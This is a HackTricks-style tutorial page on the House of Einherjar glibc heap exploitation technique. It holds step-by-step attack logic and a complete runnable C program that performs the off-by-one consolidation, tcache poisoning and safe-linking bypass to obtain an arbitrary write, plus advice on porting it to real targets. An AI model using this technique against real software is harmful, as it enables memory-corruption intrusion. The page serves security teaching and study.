hacktricks/binary-exploitation/heap/house-of-einherjar.md
2024-05-17 15:37:03 +00:00

House of Einherjar

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Basic Information

Code

Goal

  • The goal is to make malloc return a chunk at (almost) any address the attacker chooses, which yields an arbitrary write at that address.

Requirements

  • An off-by-one (typically a null byte) overflow from one chunk into the size field of the next chunk, enough to clear its PREV_INUSE bit
  • Control over the prev_size field of that next chunk, which is the last 8 bytes of the overflowing chunk's user data (glibc lets an in-use chunk's data extend over the next chunk's prev_size)
  • A heap address leak: the fake chunk's fd and bk must hold its own absolute address for the unlink checks to pass

Attack

  • A fake chunk is created inside a chunk A controlled by the attacker, with fd and bk pointing back to the fake chunk itself so that the unlink check (fd->bk == p and bk->fd == p) passes
  • 2 other chunks (B and C) are allocated right after A. C must not be a fastbin size, otherwise free(C) never reaches the consolidation code, and its size's low byte must survive the off-by-one (with a null byte, a chunk size that is a multiple of 0x100)
  • Abusing the off-by-one in B, C's PREV_INUSE bit is cleared and C's prev_size (the last 8 bytes of B's user data) is overwritten with the distance from the fake chunk A to C's chunk header
    • This prev_size and the size field of the fake chunk A must be equal, otherwise free aborts with "corrupted size vs. prev_size"
  • Then, the tcache bin for C's size is filled (7 frees), so that free(C) falls through to the consolidation path instead of being cached
  • Then, C is freed: since PREV_INUSE is clear, glibc walks back prev_size bytes, lands on the fake chunk A, unlinks it and merges A, B and C into one free chunk (into the top chunk if C borders it)
  • Then, a new chunk D is allocated from that merged region; it starts at the fake A chunk and overlaps B
  • Then, B is freed (it goes into the tcache bin for its size) and its fd/next pointer is overwritten through D so that it points to the target address
    • This is the common tcache poisoning (the fast bin attack on glibc without tcache, where the target also needs a valid size field). On glibc >= 2.32 the pointer must be mangled with safe-linking (target ^ (&B->fd >> 12)) and the target must be 16-byte aligned; on tcache glibc the bin counter must still be >= 2 when the second malloc happens, so another chunk of B's size is freed before B
  • Then, 2 mallocs of B's size are done and the second one is going to return the target address
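The full procedure above as one runnable program. This is an added example written for this page, not how2heap's or HackTricks' code. It assumes x86-64 glibc with tcache at default settings (tested logic for 2.31 through 2.39; it detects safe-linking at runtime instead of hardcoding the version), that the three chunks A, B and C come out of the top chunk contiguously (it checks this and bails out before corrupting anything otherwise), and it uses a hypothetical, 16-byte aligned global `target_buf` as the "target address" in place of a real hook or function pointer. The off-by-one is modelled by a hypothetical `copy_with_nul` routine that NUL-terminates one byte past its buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical target (stand-in for a hook, GOT slot or function-pointer
 * table). 16-byte aligned because glibc >= 2.32 rejects unaligned tcache
 * entries ("malloc(): unaligned tcache chunk detected"). */
static uint64_t target_buf[8] __attribute__((aligned(16)));

/* The assumed bug: a copy routine that NUL-terminates at buf[len], one
 * byte past the end of a buffer that only holds len bytes. */
static void copy_with_nul(uint8_t *buf, const uint8_t *src, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] = src[i];
    buf[len] = 0;                       /* the off-by-one NUL write */
}

/* House of Einherjar followed by tcache poisoning. Returns what the second
 * malloc(0x28) yields, or NULL (before touching any metadata) if the heap
 * did not lay A, B and C out contiguously. */
void *house_of_einherjar(void *target)
{
    void *pad[7];                       /* will fill the 0x100 tcache bin */
    for (int i = 0; i < 7; i++)
        pad[i] = malloc(0xf8);
    uint8_t *x = malloc(0x28);          /* second entry for the 0x30 tcache bin */

    uint64_t *a = malloc(0x38);         /* 0x40 chunk: hosts the fake chunk */
    uint8_t  *b = malloc(0x28);         /* 0x30 chunk: the off-by-one is here */
    uint8_t  *c = malloc(0xf8);         /* 0x100 chunk: not a fastbin size */
    if (b != (uint8_t *)a + 0x40 || c != b + 0x30)
        return NULL;

    /* Fake chunk inside A. Its size must equal the prev_size planted in C
     * (distance from the fake chunk to C's header) and fd/bk point to
     * itself so unlink_chunk's fd->bk == p && bk->fd == p test passes. */
    uint64_t fake_sz = (uint64_t)((c - 0x10) - (uint8_t *)a);   /* 0x60 */
    a[0] = 0;                                     /* prev_size */
    a[1] = fake_sz;                               /* size, PREV_INUSE clear */
    a[2] = a[3] = (uint64_t)(uintptr_t)a;         /* fd, bk */
    a[4] = a[5] = (uint64_t)(uintptr_t)a;         /* fd_nextsize, bk_nextsize */

    /* B's last 8 bytes are C's prev_size; the NUL written at b[0x28] is the
     * low byte of C's size (0x101 -> 0x100), which clears PREV_INUSE. */
    uint8_t payload[0x28] = {0};
    memcpy(payload + 0x20, &fake_sz, sizeof fake_sz);
    copy_with_nul(b, payload, sizeof payload);

    for (int i = 0; i < 7; i++)         /* tcache[0x100] now holds 7 chunks */
        free(pad[i]);

    /* PREV_INUSE is clear, so free(C) walks back prev_size bytes to the
     * fake chunk, checks chunksize(fake) == prev_size, unlinks it and
     * merges fake A, B and C into the top chunk that follows C. */
    free(c);

    /* D is carved from the new top: it starts at fake A and overlaps B. */
    uint8_t *d = malloc(0x58);
    if (d != (uint8_t *)a + 0x10)
        return NULL;

    /* Tcache poisoning: bin 0x30 becomes b -> x, then b's next pointer is
     * rewritten through D. glibc >= 2.32 stores next ^ (&next >> 12)
     * (safe-linking); detect that by comparing the stored value with the
     * plain pointer to x, and mangle the target the same way. */
    free(x);
    free(b);
    uintptr_t stored, poisoned = (uintptr_t)target;
    memcpy(&stored, b, sizeof stored);
    if (stored != (uintptr_t)x)
        poisoned ^= (uintptr_t)b >> 12;
    memcpy(d + (b - d), &poisoned, sizeof poisoned);

    void *first = malloc(0x28);         /* B again */
    void *second = malloc(0x28);        /* the target */
    (void)first;
    return second;
}

/* Runs the attack against target_buf and proves the resulting write. */
void *run_house_of_einherjar(void)
{
    void *p = house_of_einherjar(target_buf);
    if (p == (void *)target_buf)
        ((uint64_t *)p)[2] = 0x4141414141414141ULL;
    return p;
}

int main(void)
{
    void *p = run_house_of_einherjar();
    printf("target_buf at %p, second malloc(0x28) returned %p: %s\n",
           (void *)target_buf, p, p == (void *)target_buf ? "success" : "failed");
    return p == (void *)target_buf ? 0 : 1;
}
```

Two details worth checking when porting this to a real target: the tcache entry at the target must be 16-byte aligned (slot 0 of the target is read as the next pointer and slot 1 is zeroed as the tcache key by the second malloc, so point it 16 bytes before the data you actually want to overwrite if those bytes matter), and the contiguity checks matter because any stray free chunk of size 0x30, 0x40 or 0x100 in a bin would break the A/B/C layout silently.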

References and other examples
